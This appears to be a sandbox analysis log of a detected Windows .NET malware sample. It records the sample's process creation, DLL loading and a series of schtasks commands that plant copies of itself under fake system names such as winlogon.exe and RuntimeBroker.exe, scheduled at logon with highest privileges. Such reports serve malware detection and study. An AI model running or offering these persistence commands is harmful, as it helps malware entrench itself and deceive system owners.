Source: C:\Program Files\Windows Mail\ctfmon.exe	Mutant created: NULL
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\8191971cfb7e24d531c90d83757dc66eb418eeb2

Source: B9exXW7c3t.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: B9exXW7c3t.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\B9exXW7c3t.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\B9exXW7c3t.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: B9exXW7c3t.exe

ReversingLabs: Detection: 78%

Source: C:\Users\user\Desktop\B9exXW7c3t.exe

File read: C:\Users\user\Desktop\B9exXW7c3t.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\B9exXW7c3t.exe "C:\Users\user\Desktop\B9exXW7c3t.exe"
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 14 /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe'" /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDI" /sc ONLOGON /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 14 /tr "'C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 8 /tr "'C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe'" /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDI" /sc ONLOGON /tr "'C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 13 /tr "'C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Mail\ctfmon.exe'" /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\ctfmon.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Mail\ctfmon.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe'" /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\Saved Games\QeWHGGzCXwoQygZUiDI.exe'" /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDI" /sc ONLOGON /tr "'C:\Users\Default User\Saved Games\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Saved Games\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\AccountPictures\RuntimeBroker.exe'" /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Public\AccountPictures\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Links\ApplicationFrameHost.exe'" /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Users\Default\Links\ApplicationFrameHost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Links\ApplicationFrameHost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 6 /tr "'C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe'" /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDI" /sc ONLOGON /tr "'C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "QeWHGGzCXwoQygZUiDIQ" /sc MINUTE /mo 6 /tr "'C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe "C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe"
Source: unknown	Process created: C:\Users\Default\Links\ApplicationFrameHost.exe C:\Users\Default\Links\ApplicationFrameHost.exe
Source: unknown	Process created: C:\Users\Default\Links\ApplicationFrameHost.exe C:\Users\Default\Links\ApplicationFrameHost.exe
Source: unknown	Process created: C:\Program Files\Windows Mail\ctfmon.exe "C:\Program Files\Windows Mail\ctfmon.exe"
Source: unknown	Process created: C:\Program Files\Windows Mail\ctfmon.exe "C:\Program Files\Windows Mail\ctfmon.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe "C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe "C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe"
Source: unknown	Process created: C:\Users\Public\AccountPictures\RuntimeBroker.exe C:\Users\Public\AccountPictures\RuntimeBroker.exe
Source: unknown	Process created: C:\Users\Public\AccountPictures\RuntimeBroker.exe C:\Users\Public\AccountPictures\RuntimeBroker.exe
Source: unknown	Process created: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe "C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe"
Source: unknown	Process created: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe "C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe "C:\Users\user\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe"
Source: unknown	Process created: C:\Program Files\Windows Mail\ctfmon.exe "C:\Program Files\Windows Mail\ctfmon.exe"
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process created: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe "C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe"	Jump to behavior

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Section loaded: rsaenh.dll	Jump to behavior
